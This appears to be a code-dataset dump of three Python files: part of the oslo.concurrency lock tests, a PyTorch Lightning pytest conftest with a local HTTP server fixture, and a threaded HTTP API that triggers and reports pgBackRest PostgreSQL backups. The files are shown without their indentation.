time.sleep(0)
lock1 = lockutils.InterProcessLock('foo')
lock1.lockfile = open(lock_file, 'w')
# NOTE(bnemec): There is a brief window between when the lock file
# is created and when it actually becomes locked. If we happen to
# context switch in that window we may succeed in locking the
# file. Keep retrying until we either get the expected exception
# or timeout waiting.
while time.time() - start < 5:
try:
lock1.trylock()
lock1.unlock()
time.sleep(0)
except IOError:
# This is what we expect to happen
break
else:
self.fail('Never caught expected lock exception')
# We don't need to wait for the full sleep in the child here
os.kill(pid, signal.SIGKILL)
else:
try:
lock2 = lockutils.InterProcessLock('foo')
lock2.lockfile = open(lock_file, 'w')
have_lock = False
while not have_lock:
try:
lock2.trylock()
have_lock = True
except IOError:
pass
finally:
# NOTE(bnemec): This is racy, but I don't want to add any
# synchronization primitives that might mask a problem
# with the one we're trying to test here.
time.sleep(.5)
os._exit(0)
def test_interthread_external_lock(self):
call_list = []
@lockutils.synchronized('foo', external=True, lock_path=self.lock_dir)
def foo(param):
"""Simulate a long-running threaded operation."""
call_list.append(param)
# NOTE(bnemec): This is racy, but I don't want to add any
# synchronization primitives that might mask a problem
# with the one we're trying to test here.
time.sleep(.5)
call_list.append(param)
def other(param):
foo(param)
thread = threading.Thread(target=other, args=('other',))
thread.start()
# Make sure the other thread grabs the lock
# NOTE(bnemec): File locks do not actually work between threads, so
# this test is verifying that the local semaphore is still enforcing
# external locks in that case. This means this test does not have
# the same race problem as the process test above because when the
# file is created the semaphore has already been grabbed.
start = time.time()
while not os.path.exists(os.path.join(self.lock_dir, 'foo')):
if time.time() - start > 5:
self.fail('Timed out waiting for thread to grab lock')
time.sleep(0)
thread1 = threading.Thread(target=other, args=('main',))
thread1.start()
thread1.join()
thread.join()
self.assertEqual(['other', 'other', 'main', 'main'], call_list)
def test_non_destructive(self):
lock_file = os.path.join(self.lock_dir, 'not-destroyed')
with open(lock_file, 'w') as f:
f.write('test')
with lockutils.lock('not-destroyed', external=True,
lock_path=self.lock_dir):
with open(lock_file) as f:
self.assertEqual('test', f.read())
class LockutilsModuleTestCase(test_base.BaseTestCase):
def setUp(self):
super(LockutilsModuleTestCase, self).setUp()
self.old_env = os.environ.get('OSLO_LOCK_PATH')
if self.old_env is not None:
del os.environ['OSLO_LOCK_PATH']
def tearDown(self):
if self.old_env is not None:
os.environ['OSLO_LOCK_PATH'] = self.old_env
super(LockutilsModuleTestCase, self).tearDown()
def test_main(self):
script = '\n'.join([
'import os',
'lock_path = os.environ.get("OSLO_LOCK_PATH")',
'assert lock_path is not None',
'assert os.path.isdir(lock_path)',
])
argv = ['', sys.executable, '-c', script]
retval = lockutils._lock_wrapper(argv)
self.assertEqual(0, retval, "Bad OSLO_LOCK_PATH has been set")
def test_return_value_maintained(self):
script = '\n'.join([
'import sys',
'sys.exit(1)',
])
argv = ['', sys.executable, '-c', script]
retval = lockutils._lock_wrapper(argv)
self.assertEqual(1, retval)
def test_direct_call_explodes(self):
cmd = [sys.executable, '-m', 'oslo_concurrency.lockutils']
with open(os.devnull, 'w') as devnull:
retval = subprocess.call(cmd, stderr=devnull)
self.assertEqual(1, retval)
class TestLockFixture(test_base.BaseTestCase):
def setUp(self):
super(TestLockFixture, self).setUp()
self.config = self.useFixture(config.Config(lockutils.CONF)).config
self.tempdir = tempfile.mkdtemp()
def _check_in_lock(self):
self.assertTrue(self.lock.exists())
def tearDown(self):
self._check_in_lock()
super(TestLockFixture, self).tearDown()
def test_lock_fixture(self):
# Setup lock fixture to test that teardown is inside the lock
self.config(lock_path=self.tempdir, group='oslo_concurrency')
fixture = fixtures.LockFixture('test-lock')
self.useFixture(fixture)
self.lock = fixture.lock
class TestGetLockPath(test_base.BaseTestCase):
def setUp(self):
super(TestGetLockPath, self).setUp()
self.conf = self.useFixture(config.Config(lockutils.CONF)).conf
def test_get_default(self):
lockutils.set_defaults(lock_path='/the/path')
self.assertEqual('/the/path', lockutils.get_lock_path(self.conf))
def test_get_override(self):
lockutils._register_opts(self.conf)
self.conf.set_override('lock_path', '/alternate/path',
group='oslo_concurrency')
self.assertEqual('/alternate/path', lockutils.get_lock_path(self.conf))
|
conftest.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial, wraps
from http.server import SimpleHTTPRequestHandler
import sys
import threading
import pytest
import torch.multiprocessing as mp
def pytest_configure(config):
config.addinivalue_line("markers", "spawn: spawn test in a separate process using torch.multiprocessing.spawn")
@pytest.mark.tryfirst
def pytest_pyfunc_call(pyfuncitem):
if pyfuncitem.get_closest_marker("spawn"):
testfunction = pyfuncitem.obj
funcargs = pyfuncitem.funcargs
testargs = tuple([funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames])
mp.spawn(wraps, (testfunction, testargs))
return True
@pytest.fixture
def tmpdir_server(tmpdir):
if sys.version_info >= (3, 7):
Handler = partial(SimpleHTTPRequestHandler, directory=str(tmpdir))
from http.server import ThreadingHTTPServer
else:
# unfortunately SimpleHTTPRequestHandler doesn't accept the directory arg in python3.6
# so we have to hack it like this
import os
class Handler(SimpleHTTPRequestHandler):
def translate_path(self, path):
# get the path from cwd
path = super().translate_path(path)
# get the relative path
relpath = os.path.relpath(path, os.getcwd())
# return the full path from root_dir
return os.path.join(str(tmpdir), relpath)
# ThreadingHTTPServer was added in 3.7, so we need to define it ourselves
from http.server import HTTPServer
from socketserver import ThreadingMixIn
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
with ThreadingHTTPServer(('localhost', 0), Handler) as server:
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
yield server.server_address
server.shutdown()
|
pgbackrest-rest.py
|
#!/usr/bin/python3
"""
The purpose of this script/program is to be able to trigger backups using an api.
The reason to not have the CronJob execute the backup but only to trigger the backup
is as follows:
- a Kubernetes Cronjob is running in its own pod (different from the database)
- the backup process requires direct access to the data files
- therefore the backup process needs to run inside the same pod
as the database
- therefore a CronJob cannot execute the backup process itself
By creating this script, we can run this in a sidecar container inside the same pod as
the database. As it has an api, we can extend the api so backups become discoverable.
To ensure we don't do very silly stuff, we will only allow 1 backup to take place at any given
time. Ensuring we have long running tasks and are still responsive and sending out
timely diagnostic messages pretty much means we have multiple threads. That's why multithreading
is thrown in the mix.
Apart from the main thread we use 3 more threads:
1. HTTPServer
2. Backup
3. History
The HTTPServer is a regular HTTPServer with an extra Event thrown in to allow communication
with the other thread(s).
The backup thread its sole purpose is to run the backup once triggered using the api.
The history will gather metadata about backups from pgBackRest using a scheduled interval, or when
triggered by the backup thread.
Doing multihtreading in Python is pretty much ok for this task; this program is not here
to do a lot of heavy lifting, only ensuring backups are being triggered. All the work is
done by pgBackRest.
"""
import argparse
import datetime
import io
import json
import logging
import os
import signal
import sys
import time
import urllib.parse
from http import HTTPStatus
from http.server import BaseHTTPRequestHandler, HTTPServer
from subprocess import Popen, PIPE, check_output, STDOUT
from threading import Thread, Event, Lock
# We only ever want a single backup to be actively running. We have a global object that we share
# between the HTTP and the backup threads. Concurrent write access is prevented by a Lock and an Event
backup_history = dict()
current_backup = None
stanza = None
EPOCH = datetime.datetime(1970, 1, 1, 0, 0, 0).replace(tzinfo=datetime.timezone.utc)
LOGLEVELS = {'debug': 10, 'info': 20, 'warning': 30, 'error': 40, 'critical': 50}
def parse_arguments(args):
"""Parse the specified arguments"""
parser = argparse.ArgumentParser(description="This program provides an api to pgBackRest",
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=40, width=120))
parser.add_argument('--loglevel', help='Explicitly provide loglevel', default='info', choices=list(LOGLEVELS.keys()))
parser.add_argument('-p', '--port', help='http listen port', type=int, default=8081)
parser.add_argument('-s', '--stanza', help='stanza to be used by pgBackRest', default=os.environ.get('PGBACKREST_STANZA', None))
parsed = parser.parse_args(args or [])
return parsed
def utcnow():
"""Wraps around datetime utcnow to provide a consistent way of returning a truncated now in utc"""
return datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).replace(microsecond=0)
def json_serial(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, (datetime.datetime,)):
return obj.isoformat()
elif isinstance(obj, (datetime.timedelta,)):
return obj.total_seconds()
elif isinstance(obj, (PostgreSQLBackup,)):
return obj.details()
raise TypeError("Type %s not serializable" % type(obj))
class PostgreSQLBackup ():
"""This Class represents a single PostgreSQL backup
Metadata of the backup is kept, as well as output from the actual backup command."""
def __init__(self, stanza, request={}, status='REQUESTED', started=None, finished=None):
self.started = started or utcnow()
self.finished = finished
self.pgbackrest_info = {}
self.label = self.started.strftime('%Y%m%d%H%M%S')
self.request = request or {}
self.stanza = stanza
self.pid = None
self.request.setdefault('command', 'backup')
self.request.setdefault('type', 'full')
if self.request and self.request.get('command', 'backup') != 'backup':
raise ValueError('Invalid command ({0}), supported commands: backup'.format(self.request['command']))
self.status = status
self.returncode = None
def info(self):
info = {'label': self.label, 'status': self.status, 'started': self.started, 'finished': self.finished}
info['pgbackrest'] = {'label': self.pgbackrest_info.get('label')}
return info
def details(self):
details = self.info()
details['returncode'] = self.returncode
details['pgbackrest'] = self.pgbackrest_info
details['pid'] = self.pid
if self.started:
details['duration'] = (self.finished or utcnow()) - self.started
details['age'] = (utcnow() - self.started)
return details
def run(self):
"""Runs pgBackRest as a subprocess
reads stdout/stderr and immediately logs these as well"""
logging.info("Starting backup")
self.status = 'RUNNING'
cmd = ['pgbackrest',
'--stanza={0}'.format(self.stanza),
'--log-level-console=off',
'--log-level-stderr=warn',
self.request['command'],
'--type={0}'.format(self.request['type'])]
# We want to augment the output with our default logging format,
# that is why we send both stdout/stderr to a PIPE over which we iterate
try:
p = Popen(cmd, stdout=PIPE, stderr=STDOUT)
self.pid = p.pid
for line in io.TextIOWrapper(p.stdout, encoding="utf-8"):
if line.startswith('WARN'):
loglevel = logging.WARNING
elif line.startswith('ERROR'):
loglevel = logging.ERROR
else:
loglevel = logging.INFO
logging.log(loglevel, line.rstrip())
self.returncode = p.wait()
self.finished = utcnow()
# As many things can - and will - go wrong when calling a subprocess, we will catch and log that
# error and mark this backup as having failed.
except OSError as oe:
logging.exception(oe)
self.returncode = -1
logging.debug('Backup details\n{0}'.format(json.dumps(self.details(), default=json_serial, indent=4, sort_keys=True)))
if self.returncode == 0:
self.status = 'FINISHED'
logging.info('Backup successful: {0}'.format(self.label))
else:
self.status = 'ERROR'
logging.error('Backup {0} failed with returncode {1}'.format(self.label, self.returncode,))
class EventHTTPServer(HTTPServer):
"""Wraps around HTTPServer to provide a global Lock to serialize access to the backup"""
def __init__(self, backup_trigger, *args, **kwargs):
HTTPServer.__init__(self, *args, **kwargs)
self.backup_trigger = backup_trigger
self.lock = Lock()
class RequestHandler(BaseHTTPRequestHandler):
"""Serves the API for the pgBackRest backups"""
def _write_response(self, status_code, body, content_type='text/html', headers=None):
self.send_response(status_code)
headers = headers or {}
if content_type:
headers['Content-Type'] = content_type
for name, value in headers.items():
self.send_header(name, value)
self.end_headers()
self.wfile.write(body.encode('utf-8'))
def _write_json_response(self, status_code, body, headers=None):
contents = json.dumps(body, sort_keys=True, indent=4, default=json_serial)
self._write_response(status_code, contents, content_type='application/json', headers=headers)
# We override the default BaseHTTPRequestHandler.log_message to have uniform logging output to stdout
def log_message(self, format, *args):
logging.info(("%s - - %s\n" % (self.address_string(), format % args)).rstrip())
def do_GET(self):
"""List the backup(s) that can be identified through the path or query parameters
Api:
/backups/ list all backups
/backups/{label} get specific backup info for given label
accepts timestamp label as well as pgBackRest label
/backups/{latest} shorthand for getting the backup info for the latest backup
Query parameters:
status filter all backups for given status
Example: /backups/latest?status=ERROR
Would list the last backup that failed
"""
global backup_history
url = urllib.parse.urlsplit(self.path)
query = urllib.parse.parse_qs(url.query)
# /backups/ list all backups
backup_labels = sorted(backup_history, key=lambda b: backup_history[b].label)
if query.get('status', None):
for b in backup_labels[:]:
if backup_history[b].status not in [s.upper() for s in query['status']]:
backup_labels.remove(b)
if url.path == '/backups' or url.path == '/backups/':
body = [backup_history[b].info() for b in backup_labels]
self._write_json_response(status_code=200, body=body)
# /backups/{label} get specific backup info
# /backups/latest shorthand for getting the backup info for the latest backup
elif url.path.startswith('/backups/backup'):
backup_label = url.path.split('/')[3]
backup = None
if backup_label == 'latest' and backup_labels:
backup_label = backup_labels[-1]
backup = backup_history.get(backup_label, None)
# We also allow the backup label to be the one specified by pgBackRest
if backup is None:
for b in backup_history.values():
if b.pgbackrest_info.get('info', None):
backup = b
if backup is None:
self._write_response(status_code=HTTPStatus.NOT_FOUND, body='')
else:
self._write_json_response(status_code=HTTPStatus.OK, body=backup.details())
else:
self._write_response(status_code=HTTPStatus.NOT_FOUND, body='')
return
def do_POST(self):
"""POST a request to backup the database
If no backup is currently running, will trigger the backup thread to
start a backup that conforms to the request
"""
global backup_history, current_backup, stanza
url = urllib.parse.urlsplit(self.path)
if url.path == '/backups' or url.path == '/backups/':
try:
content_len = int(self.headers.get('Content-Length', 0))
post_body = json.loads(self.rfile.read(content_len).decode("utf-8")) if content_len else None
with self.server.lock:
if self.server.backup_trigger.is_set():
headers = {'Location': '/backups/backup/{0}'.format(current_backup.label)}
self._write_json_response(status_code=HTTPStatus.CONFLICT, body={'error': 'backup in progress'}, headers=headers)
else:
self.server.backup_trigger.set()
current_backup = PostgreSQLBackup(request=post_body, stanza=stanza)
backup_history[current_backup.label] = current_backup
# We wait a few seconds just in case we quickly run into an error which we can report
max_time = time.time() + 1
while not current_backup.finished and time.time() < max_time:
time.sleep(0.1)
if current_backup.finished:
if current_backup.returncode == 0:
self._write_json_response(status_code=HTTPStatus.OK, body=current_backup.details())
else:
self._write_json_response(status_code=HTTPStatus.INTERNAL_SERVER_ERROR, body=current_backup.details())
else:
headers = {'Location': '/backups/backup/{0}'.format(current_backup.label)}
self._write_json_response(status_code=HTTPStatus.ACCEPTED, body=current_backup.details(), headers=headers)
except json.JSONDecodeError:
self._write_json_response(status_code=HTTPStatus.BAD_REQUEST, body={'error': 'invalid json document'})
except ValueError as ve:
self._write_json_response(status_code=HTTPStatus.BAD_REQUEST, body={'error': str(ve)})
else:
self._write_response(status_code=HTTPStatus.NOT_FOUND, body='')
def backup_poller(backup_trigger, history_trigger, shutdown_trigger):
"""Run backups every time the backup_trigger is fired
Will stall for long amounts of time as backups can take hours/days.
"""
global backup_history, current_backup
logging.info('Starting loop waiting for backup events')
while not shutdown_trigger.is_set():
# This can probably be done more perfectly, but by sleeping 1 second we ensure 2 things:
# - backups can be identified by their timestamp with a resolution of 1 second
# - if there are any errors in the backup logic, we will not burn a single CPU in the while loop
time.sleep(1)
try:
logging.debug('Waiting until backup triggered')
backup_trigger.wait()
if shutdown_trigger.is_set():
break
current_backup.run()
history_trigger.set()
backup_trigger.clear()
except Exception as e:
logging.error(e)
# The currently running backup failed, we should clear the backup trigger
# so a next backup can be started
backup_trigger.clear()
logging.warning('Shutting down thread')
def history_refresher(history_trigger, shutdown_trigger, interval):
"""Refresh backup history regularly from pgBackRest
Will refresh the history when triggered, on when a timeout occurs.
After the first pgBackRest run, this should show the history as it is known by
pgBackRest.
As the backup repository is supposed to be in S3, this means that calling the API
to get information about the backup history should show you all the backups of all
the pods, not just the backups of this pod.
For details on what pgBackRest returns:
https://pgbackrest.org/command.html#command-info/category-command/option-output
"""
global backup_history, stanza
while not shutdown_trigger.is_set():
time.sleep(1)
try:
history_trigger.wait(timeout=interval)
if shutdown_trigger.is_set():
break
logging.info('Refreshing backup history using pgbackrest')
pgbackrest_out = check_output(['pgbackrest', '--stanza={0}'.format(stanza), 'info', '--output=json']).decode("utf-8")
for b in backup_history.values():
b.pgbackrest_info.clear()
backup_info = json.loads(pgbackrest_out)
if backup_info:
for b in backup_info[0].get('backup', []):
pgb = PostgreSQLBackup(
stanza=stanza,
request=None,
started=EPOCH + datetime.timedelta(seconds=b['timestamp']['start']),
finished=EPOCH + datetime.timedelta(seconds=b['timestamp']['stop']),
status='FINISHED'
)
backup_history.setdefault(pgb.label, pgb)
backup_history[pgb.label].pgbackrest_info.update(b)
# This thread should keep running, as it only triggers backups. Therefore we catch
# all errors and log them, but The Thread Must Go On
except Exception as e:
logging.exception(e)
finally:
history_trigger.clear()
logging.warning('Shutting down thread')
def main(args):
"""This is the core program
To aid in testing this, we expect args to be a dictionary with already parsed options"""
global stanza
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(threadName)s - %(message)s', level=LOGLEVELS[args['loglevel'].lower()])
stanza = args['stanza']
shutdown_trigger = Event()
backup_trigger = Event()
history_trigger = Event()
backup_thread = Thread(target=backup_poller, args=(backup_trigger, history_trigger, shutdown_trigger), name='backup')
history_thread = Thread(target=history_refresher, name='history', args=(history_trigger, shutdown_trigger, 3600))
server_address = ('', args['port'])
httpd = EventHTTPServer(backup_trigger, server_address, RequestHandler)
httpd_thread = Thread(target=httpd.serve_forever, name='http')
# For cleanup, we will trigger all events when signaled, all the threads
# will investigate the shutdown trigger before acting on their individual
# triggers
def sigterm_handler(_signo, _stack_frame):
logging.warning('Received kill {0}, shutting down'.format(_signo))
shutdown_trigger.set()
backup_trigger.set()
history_trigger.set()
httpd.shutdown()
while backup_thread.is_alive() or history_thread.is_alive() or httpd_thread.is_alive():
time.sleep(1)
signal.signal(signal.SIGINT, sigterm_handler)
signal.signal(signal.SIGTERM, sigterm_handler)
backup_thread.start()
history_trigger.set()
history_thread.start()
httpd_thread.start()
if __name__ == '__main__':
main(vars(parse_arguments(sys.argv[1:])))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.